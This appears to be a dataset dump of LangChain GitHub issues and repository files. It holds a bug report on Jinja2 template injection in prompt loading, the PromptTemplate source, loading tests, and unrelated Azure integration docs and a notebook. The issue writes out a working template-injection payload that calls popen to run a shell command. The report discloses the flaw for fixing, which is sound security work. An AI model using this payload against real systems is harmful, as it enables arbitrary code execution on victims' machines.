"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/prompt.py | """Prompt schema definition."""
from __future__ import annotations
from pathlib import Path
from string import Formatter
from typing import Any, Dict, List, Optional, Union
from langchain.prompts.base import (
DEFAULT_FORMATTER_MAPPING,
StringPromptTemplate,
_get_jinja2_variables_from_template,
check_valid_template,
)
from langchain.pydantic_v1 import root_validator
class PromptTemplate(StringPromptTemplate):
"""A prompt template for a language model.
A prompt template consists of a string template. It accepts a set of parameters
from the user that can be used to generate a prompt for a language model.
The template can be formatted using either f-strings (default) or jinja2 syntax.
Example:
.. code-block:: python
from langchain.prompts import PromptTemplate
# Instantiation using from_template (recommended)
prompt = PromptTemplate.from_template("Say {foo}")
prompt.format(foo="bar")
# Instantiation using initializer
prompt = PromptTemplate(input_variables=["foo"], template="Say {foo}")
"""
@property
def lc_attributes(self) -> Dict[str, Any]:
return {
"template_format": self.template_format,
}
input_variables: List[str]
"""A list of the names of the variables the prompt template expects."""
template: str
"""The prompt template."""
template_format: str = "f-string"
"""The format of the prompt template. Options are: 'f-string', 'jinja2'."""
validate_template: bool = True
"""Whether or not to try validating the template."""
def __add__(self, other: Any) -> PromptTemplate:
"""Override the + operator to allow for combining prompt templates."""
# Allow for easy combining
if isinstance(other, PromptTemplate):
if self.template_format != "f-string":
raise ValueError(
"Adding prompt templates only supported for f-strings."
)
if other.template_format != "f-string":
raise ValueError(
"Adding prompt templates only supported for f-strings."
)
input_variables = list(
set(self.input_variables) | set(other.input_variables)
)
template = self.template + other.template
# If any do not want to validate, then don't
validate_template = self.validate_template and other.validate_template
partial_variables = {k: v for k, v in self.partial_variables.items()}
for k, v in other.partial_variables.items():
if k in partial_variables:
raise ValueError("Cannot have same variable partialed twice.")
else:
partial_variables[k] = v
return PromptTemplate(
template=template,
input_variables=input_variables,
partial_variables=partial_variables,
template_format="f-string",
validate_template=validate_template,
)
elif isinstance(other, str):
prompt = PromptTemplate.from_template(other)
return self + prompt
else:
raise NotImplementedError(f"Unsupported operand type for +: {type(other)}")
@property
def _prompt_type(self) -> str:
"""Return the prompt type key."""
return "prompt"
def format(self, **kwargs: Any) -> str:
"""Format the prompt with the inputs.
Args:
kwargs: Any arguments to be passed to the prompt template.
Returns:
A formatted string.
Example:
.. code-block:: python
prompt.format(variable1="foo")
"""
kwargs = self._merge_partial_and_user_variables(**kwargs)
return DEFAULT_FORMATTER_MAPPING[self.template_format](self.template, **kwargs)
@root_validator()
def template_is_valid(cls, values: Dict) -> Dict:
"""Check that template and input variables are consistent."""
if values["validate_template"]:
all_inputs = values["input_variables"] + list(values["partial_variables"])
check_valid_template(
values["template"], values["template_format"], all_inputs
)
return values
@classmethod
def from_examples(
cls,
examples: List[str],
suffix: str,
input_variables: List[str],
example_separator: str = "\n\n",
prefix: str = "",
**kwargs: Any,
) -> PromptTemplate:
"""Take examples in list format with prefix and suffix to create a prompt.
Intended to be used as a way to dynamically create a prompt from examples.
Args:
examples: List of examples to use in the prompt.
suffix: String to go after the list of examples. Should generally
set up the user's input.
input_variables: A list of variable names the final prompt template
will expect.
example_separator: The separator to use in between examples. Defaults
to two new line characters.
prefix: String that should go before any examples. Generally includes
examples. Default to an empty string.
Returns:
The final prompt generated.
"""
template = example_separator.join([prefix, *examples, suffix])
return cls(input_variables=input_variables, template=template, **kwargs)
@classmethod
def from_file(
cls, template_file: Union[str, Path], input_variables: List[str], **kwargs: Any
) -> PromptTemplate:
"""Load a prompt from a file.
Args:
template_file: The path to the file containing the prompt template.
input_variables: A list of variable names the final prompt template
will expect.
Returns:
The prompt loaded from the file.
"""
with open(str(template_file), "r") as f:
template = f.read()
return cls(input_variables=input_variables, template=template, **kwargs)
@classmethod
def from_template(
cls,
template: str,
*,
template_format: str = "f-string",
partial_variables: Optional[Dict[str, Any]] = None,
**kwargs: Any,
) -> PromptTemplate:
"""Load a prompt template from a template.
Args:
template: The template to load.
template_format: The format of the template. Use `jinja2` for jinja2,
and `f-string` or None for f-strings.
partial_variables: A dictionary of variables that can be used to partially
fill in the template. For example, if the template is
`"{variable1} {variable2}"`, and `partial_variables` is
`{"variable1": "foo"}`, then the final prompt will be
`"foo {variable2}"`.
Returns:
The prompt template loaded from the template.
"""
if template_format == "jinja2":
# Get the variables for the template
input_variables = _get_jinja2_variables_from_template(template)
elif template_format == "f-string":
input_variables = {
v for _, v, _, _ in Formatter().parse(template) if v is not None
}
else:
raise ValueError(f"Unsupported template format: {template_format}")
_partial_variables = partial_variables or {}
if _partial_variables:
input_variables = {
var for var in input_variables if var not in _partial_variables
}
return cls(
input_variables=sorted(input_variables),
template=template,
template_format=template_format,
partial_variables=_partial_variables,
**kwargs,
)
# For backwards compatibility.
Prompt = PromptTemplate
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/tests/unit_tests/examples/jinja_injection_prompt.json | |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/tests/unit_tests/examples/jinja_injection_prompt.yaml | |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/tests/unit_tests/prompts/test_loading.py | """Test loading functionality."""
import os
from contextlib import contextmanager
from pathlib import Path
from typing import Iterator
from langchain.output_parsers import RegexParser
from langchain.prompts.few_shot import FewShotPromptTemplate
from langchain.prompts.loading import load_prompt
from langchain.prompts.prompt import PromptTemplate
EXAMPLE_DIR = Path("tests/unit_tests/examples").absolute()
@contextmanager
def change_directory(dir: Path) -> Iterator:
"""Change the working directory to the right folder."""
origin = Path().absolute()
try:
os.chdir(dir)
yield
finally:
os.chdir(origin)
def test_loading_from_YAML() -> None:
"""Test loading from yaml file."""
prompt = load_prompt(EXAMPLE_DIR / "simple_prompt.yaml")
expected_prompt = PromptTemplate(
input_variables=["adjective", "content"],
template="Tell me a {adjective} joke about {content}.",
)
assert prompt == expected_prompt
def test_loading_from_JSON() -> None:
"""Test loading from json file."""
prompt = load_prompt(EXAMPLE_DIR / "simple_prompt.json")
expected_prompt = PromptTemplate(
input_variables=["adjective", "content"],
template="Tell me a {adjective} joke about {content}.",
)
assert prompt == expected_prompt
def test_saving_loading_round_trip(tmp_path: Path) -> None:
"""Test equality when saving and loading a prompt."""
simple_prompt = PromptTemplate(
input_variables=["adjective", "content"],
template="Tell me a {adjective} joke about {content}.",
)
simple_prompt.save(file_path=tmp_path / "prompt.yaml")
loaded_prompt = load_prompt(tmp_path / "prompt.yaml")
assert loaded_prompt == simple_prompt
few_shot_prompt = FewShotPromptTemplate(
input_variables=["adjective"],
prefix="Write antonyms for the following words.",
example_prompt=PromptTemplate(
input_variables=["input", "output"],
template="Input: {input}\nOutput: {output}",
),
examples=[
{"input": "happy", "output": "sad"},
{"input": "tall", "output": "short"},
],
suffix="Input: {adjective}\nOutput:",
)
few_shot_prompt.save(file_path=tmp_path / "few_shot.yaml")
loaded_prompt = load_prompt(tmp_path / "few_shot.yaml")
assert loaded_prompt == few_shot_prompt
def test_loading_with_template_as_file() -> None:
"""Test loading when the template is a file."""
with change_directory(EXAMPLE_DIR):
prompt = load_prompt("simple_prompt_with_template_file.json")
expected_prompt = PromptTemplate(
input_variables=["adjective", "content"],
template="Tell me a {adjective} joke about {content}.",
)
assert prompt == expected_prompt
def test_loading_few_shot_prompt_from_yaml() -> None:
"""Test loading few shot prompt from yaml."""
with change_directory(EXAMPLE_DIR):
prompt = load_prompt("few_shot_prompt.yaml")
expected_prompt = FewShotPromptTemplate(
input_variables=["adjective"],
prefix="Write antonyms for the following words.",
example_prompt=PromptTemplate(
input_variables=["input", "output"],
template="Input: {input}\nOutput: {output}",
),
examples=[
{"input": "happy", "output": "sad"},
{"input": "tall", "output": "short"},
],
suffix="Input: {adjective}\nOutput:",
)
assert prompt == expected_prompt
def test_loading_few_shot_prompt_from_json() -> None:
"""Test loading few shot prompt from json."""
with change_directory(EXAMPLE_DIR):
prompt = load_prompt("few_shot_prompt.json")
expected_prompt = FewShotPromptTemplate(
input_variables=["adjective"],
prefix="Write antonyms for the following words.",
example_prompt=PromptTemplate(
input_variables=["input", "output"],
template="Input: {input}\nOutput: {output}",
),
examples=[
{"input": "happy", "output": "sad"},
{"input": "tall", "output": "short"},
],
suffix="Input: {adjective}\nOutput:",
)
assert prompt == expected_prompt
def test_loading_few_shot_prompt_when_examples_in_config() -> None:
"""Test loading few shot prompt when the examples are in the config."""
with change_directory(EXAMPLE_DIR):
prompt = load_prompt("few_shot_prompt_examples_in.json")
expected_prompt = FewShotPromptTemplate(
input_variables=["adjective"],
prefix="Write antonyms for the following words.",
example_prompt=PromptTemplate(
input_variables=["input", "output"],
template="Input: {input}\nOutput: {output}",
),
examples=[
{"input": "happy", "output": "sad"},
{"input": "tall", "output": "short"},
],
suffix="Input: {adjective}\nOutput:",
)
assert prompt == expected_prompt
def test_loading_few_shot_prompt_example_prompt() -> None:
"""Test loading few shot when the example prompt is in its own file."""
with change_directory(EXAMPLE_DIR):
prompt = load_prompt("few_shot_prompt_example_prompt.json")
expected_prompt = FewShotPromptTemplate(
input_variables=["adjective"],
prefix="Write antonyms for the following words.",
example_prompt=PromptTemplate(
input_variables=["input", "output"],
template="Input: {input}\nOutput: {output}",
),
examples=[
{"input": "happy", "output": "sad"},
{"input": "tall", "output": "short"},
],
suffix="Input: {adjective}\nOutput:",
)
assert prompt == expected_prompt
def test_loading_with_output_parser() -> None:
with change_directory(EXAMPLE_DIR):
prompt = load_prompt("prompt_with_output_parser.json")
expected_template = "Given the following question and student answer, provide a correct answer and score the student answer.\nQuestion: {question}\nStudent Answer: {student_answer}\nCorrect Answer:" # noqa: E501
expected_prompt = PromptTemplate(
input_variables=["question", "student_answer"],
output_parser=RegexParser(
regex="(.*?)\nScore: (.*)",
output_keys=["answer", "score"],
),
template=expected_template,
)
assert prompt == expected_prompt
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
This capability described in the feature request is currently not available for Langchain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | docs/docs/integrations/platforms/microsoft.mdx | # Microsoft
All functionality related to Microsoft
## LLM
### Azure OpenAI
>[Microsoft Azure](https://en.wikipedia.org/wiki/Microsoft_Azure), often referred to as `Azure` is a cloud computing platform run by `Microsoft`, which offers access, management, and development of applications and services through global data centers. It provides a range of capabilities, including software as a service (SaaS), platform as a service (PaaS), and infrastructure as a service (IaaS). `Microsoft Azure` supports many programming languages, tools, and frameworks, including Microsoft-specific and third-party software and systems.
>[Azure OpenAI](https://learn.microsoft.com/en-us/azure/cognitive-services/openai/) is an `Azure` service with powerful language models from `OpenAI` including the `GPT-3`, `Codex` and `Embeddings model` series for content generation, summarization, semantic search, and natural language to code translation.
```bash
pip install openai tiktoken
```
Set the environment variables to get access to the `Azure OpenAI` service.
```python
import os
os.environ["OPENAI_API_TYPE"] = "azure"
os.environ["OPENAI_API_BASE"] = "https://<your-endpoint.openai.azure.com/"
os.environ["OPENAI_API_KEY"] = "your AzureOpenAI key"
os.environ["OPENAI_API_VERSION"] = "2023-05-15"
```
See a [usage example](/docs/integrations/llms/azure_openai_example).
```python
from langchain.llms import AzureOpenAI
```
## Text Embedding Models
### Azure OpenAI
See a [usage example](/docs/integrations/text_embedding/azureopenai)
```python
from langchain.embeddings import OpenAIEmbeddings
```
## Chat Models
### Azure OpenAI
See a [usage example](/docs/integrations/chat/azure_chat_openai)
```python
from langchain.chat_models import AzureChatOpenAI
```
## Document loaders
### Azure Blob Storage
>[Azure Blob Storage](https://learn.microsoft.com/en-us/azure/storage/blobs/storage-blobs-introduction) is Microsoft's object storage solution for the cloud. Blob Storage is optimized for storing massive amounts of unstructured data. Unstructured data is data that doesn't adhere to a particular data model or definition, such as text or binary data.
>[Azure Files](https://learn.microsoft.com/en-us/azure/storage/files/storage-files-introduction) offers fully managed
> file shares in the cloud that are accessible via the industry standard Server Message Block (`SMB`) protocol,
> Network File System (`NFS`) protocol, and `Azure Files REST API`. `Azure Files` are based on the `Azure Blob Storage`.
`Azure Blob Storage` is designed for:
- Serving images or documents directly to a browser.
- Storing files for distributed access.
- Streaming video and audio.
- Writing to log files.
- Storing data for backup and restore, disaster recovery, and archiving.
- Storing data for analysis by an on-premises or Azure-hosted service.
```bash
pip install azure-storage-blob
```
See a [usage example for the Azure Blob Storage](/docs/integrations/document_loaders/azure_blob_storage_container.html).
```python
from langchain.document_loaders import AzureBlobStorageContainerLoader
```
See a [usage example for the Azure Files](/docs/integrations/document_loaders/azure_blob_storage_file.html).
```python
from langchain.document_loaders import AzureBlobStorageFileLoader
```
### Microsoft OneDrive
>[Microsoft OneDrive](https://en.wikipedia.org/wiki/OneDrive) (formerly `SkyDrive`) is a file-hosting service operated by Microsoft.
First, you need to install a python package.
```bash
pip install o365
```
See a [usage example](/docs/integrations/document_loaders/microsoft_onedrive).
```python
from langchain.document_loaders import OneDriveLoader
```
### Microsoft Word
>[Microsoft Word](https://www.microsoft.com/en-us/microsoft-365/word) is a word processor developed by Microsoft.
See a [usage example](/docs/integrations/document_loaders/microsoft_word).
```python
from langchain.document_loaders import UnstructuredWordDocumentLoader
```
## Retriever
### Azure Cognitive Search
>[Azure Cognitive Search](https://learn.microsoft.com/en-us/azure/search/search-what-is-azure-search) (formerly known as `Azure Search`) is a cloud search service that gives developers infrastructure, APIs, and tools for building a rich search experience over private, heterogeneous content in web, mobile, and enterprise applications.
>Search is foundational to any app that surfaces text to users, where common scenarios include catalog or document search, online retail apps, or data exploration over proprietary content. When you create a search service, you'll work with the following capabilities:
>- A search engine for full text search over a search index containing user-owned content
>- Rich indexing, with lexical analysis and optional AI enrichment for content extraction and transformation
>- Rich query syntax for text search, fuzzy search, autocomplete, geo-search and more
>- Programmability through REST APIs and client libraries in Azure SDKs
>- Azure integration at the data layer, machine learning layer, and AI (Cognitive Services)
See [set up instructions](https://learn.microsoft.com/en-us/azure/search/search-create-service-portal).
See a [usage example](/docs/integrations/retrievers/azure_cognitive_search).
```python
from langchain.retrievers import AzureCognitiveSearchRetriever
```
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
This capability described in the feature request is currently not available for Langchain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | docs/docs/integrations/vectorstores/azure_cosmos_db.ipynb | |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,627 | Add AzureCosmosDBVectorSearch VectorStore | ### Feature request
### Feature request
Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high dimensional vector data stored directly in Azure Cosmos DB for MongoDB vCore. It contains similarity measures such as COS (cosine distance), L2 (Euclidean distance) or IP (inner product) which measures the distance between the data vectors and your query vector. The data vectors that are closest to your query vector are the ones that are found to be most similar semantically and retrieved during query time. The accompanying PR would add support for Langchain Python users to store vectors from document embeddings generated from APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.
[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)
### Motivation
This capability described in the feature request is currently not available for Langchain Python.
### Your contribution
I will be submitting a PR for this feature request. | https://github.com/langchain-ai/langchain/issues/11627 | https://github.com/langchain-ai/langchain/pull/11632 | 28ee6a7c125f1eb209b6b6428d1a50040408ea9f | d0603c86b6dc559799c64033d330075a8744435e | "2023-10-10T20:55:53Z" | python | "2023-10-11T20:56:46Z" | docs/docs/integrations/vectorstores/azuresearch.ipynb | {
"cells": [
{
"cell_type": "markdown",
"metadata": {},
"source": [
"# Azure Cognitive Search\n",
"\n",
"[Azure Cognitive Search](https://learn.microsoft.com/azure/search/search-what-is-azure-search) (formerly known as `Azure Search`) is a cloud search service that gives developers infrastructure, APIs, and tools for building a rich search experience over private, heterogeneous content in web, mobile, and enterprise applications.\n",
"\n",
"Vector search is currently in public preview. It's available through the Azure portal, preview REST API and beta client libraries. [More info](https://learn.microsoft.com/en-us/azure/search/vector-search-overview) Beta client libraries are subject to potential breaking changes, please be sure to use the SDK package version identified below. azure-search-documents==11.4.0b8"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"# Install Azure Cognitive Search SDK"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"!pip install azure-search-documents==11.4.0b8\n",
"!pip install azure-identity"
]
},
{
"attachments": {},
"cell_type": "markdown",
"metadata": {},
"source": [
"## Import required libraries"
]
},
{
"cell_type": "code",
"execution_count": 1,
"metadata": {},
"outputs": [],
"source": [
"import openai\n",
"import os\n",
"from langchain.embeddings import OpenAIEmbeddings\n",
"from langchain.vectorstores.azuresearch import AzureSearch"
]
},
{
"attachments": {},
"cell_type": "markdown",
"metadata": {},
"source": [
"## Configure OpenAI settings\n",
"Configure the OpenAI settings to use Azure OpenAI or OpenAI"
]
},
{
"cell_type": "code",
"execution_count": 2,
"metadata": {},
"outputs": [],
"source": [
"os.environ[\"OPENAI_API_TYPE\"] = \"azure\"\n",
"os.environ[\"OPENAI_API_BASE\"] = \"YOUR_OPENAI_ENDPOINT\"\n",
"os.environ[\"OPENAI_API_KEY\"] = \"YOUR_OPENAI_API_KEY\"\n",
"os.environ[\"OPENAI_API_VERSION\"] = \"2023-05-15\"\n",
"model: str = \"text-embedding-ada-002\""
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Configure vector store settings\n",
" \n",
"Set up the vector store settings using environment variables:"
]
},
{
"cell_type": "code",
"execution_count": 3,
"metadata": {},
"outputs": [],
"source": [
"vector_store_address: str = \"YOUR_AZURE_SEARCH_ENDPOINT\"\n",
"vector_store_password: str = \"YOUR_AZURE_SEARCH_ADMIN_KEY\""
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Create embeddings and vector store instances\n",
" \n",
"Create instances of the OpenAIEmbeddings and AzureSearch classes:"
]
},
{
"cell_type": "code",
"execution_count": 4,
"metadata": {},
"outputs": [],
"source": [
"embeddings: OpenAIEmbeddings = OpenAIEmbeddings(deployment=model, chunk_size=1)\n",
"index_name: str = \"langchain-vector-demo\"\n",
"vector_store: AzureSearch = AzureSearch(\n",
" azure_search_endpoint=vector_store_address,\n",
" azure_search_key=vector_store_password,\n",
" index_name=index_name,\n",
" embedding_function=embeddings.embed_query,\n",
")"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Insert text and embeddings into vector store\n",
" \n",
"Add texts and metadata from the JSON data to the vector store:"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"from langchain.document_loaders import TextLoader\n",
"from langchain.text_splitter import CharacterTextSplitter\n",
"\n",
"loader = TextLoader(\"../../../state_of_the_union.txt\", encoding=\"utf-8\")\n",
"\n",
"documents = loader.load()\n",
"text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)\n",
"docs = text_splitter.split_documents(documents)\n",
"\n",
"vector_store.add_documents(documents=docs)"
]
},
{
"attachments": {},
"cell_type": "markdown",
"metadata": {},
"source": [
"## Perform a vector similarity search\n",
" \n",
"Execute a pure vector similarity search using the similarity_search() method:"
]
},
{
"cell_type": "code",
"execution_count": 5,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you’re at it, pass the Disclose Act so Americans can know who is funding our elections. \n",
"\n",
"Tonight, I’d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer—an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. \n",
"\n",
"One of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \n",
"\n",
"And I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation’s top legal minds, who will continue Justice Breyer’s legacy of excellence.\n"
]
}
],
"source": [
"# Perform a similarity search\n",
"docs = vector_store.similarity_search(\n",
" query=\"What did the president say about Ketanji Brown Jackson\",\n",
" k=3,\n",
" search_type=\"similarity\",\n",
")\n",
"print(docs[0].page_content)"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Perform a vector similarity search with relevance scores\n",
" \n",
"Execute a pure vector similarity search using the similarity_search_with_relevance_scores() method:"
]
},
{
"cell_type": "code",
"execution_count": 12,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"[(Document(page_content='Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you’re at it, pass the Disclose Act so Americans can know who is funding our elections. \\n\\nTonight, I’d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer—an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. \\n\\nOne of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \\n\\nAnd I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation’s top legal minds, who will continue Justice Breyer’s legacy of excellence.', metadata={'source': 'C:\\\\repos\\\\langchain-fruocco-acs\\\\langchain\\\\docs\\\\extras\\\\modules\\\\state_of_the_union.txt'}),\n",
" 0.8441472),\n",
" (Document(page_content='Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you’re at it, pass the Disclose Act so Americans can know who is funding our elections. \\n\\nTonight, I’d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer—an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. \\n\\nOne of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \\n\\nAnd I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation’s top legal minds, who will continue Justice Breyer’s legacy of excellence.', metadata={'source': 'C:\\\\repos\\\\langchain-fruocco-acs\\\\langchain\\\\docs\\\\extras\\\\modules\\\\state_of_the_union.txt'}),\n",
" 0.8441472),\n",
" (Document(page_content='A former top litigator in private practice. A former federal public defender. And from a family of public school educators and police officers. A consensus builder. Since she’s been nominated, she’s received a broad range of support—from the Fraternal Order of Police to former judges appointed by Democrats and Republicans. \\n\\nAnd if we are to advance liberty and justice, we need to secure the Border and fix the immigration system. \\n\\nWe can do both. At our border, we’ve installed new technology like cutting-edge scanners to better detect drug smuggling. \\n\\nWe’ve set up joint patrols with Mexico and Guatemala to catch more human traffickers. \\n\\nWe’re putting in place dedicated immigration judges so families fleeing persecution and violence can have their cases heard faster. \\n\\nWe’re securing commitments and supporting partners in South and Central America to host more refugees and secure their own borders.', metadata={'source': 'C:\\\\repos\\\\langchain-fruocco-acs\\\\langchain\\\\docs\\\\extras\\\\modules\\\\state_of_the_union.txt'}),\n",
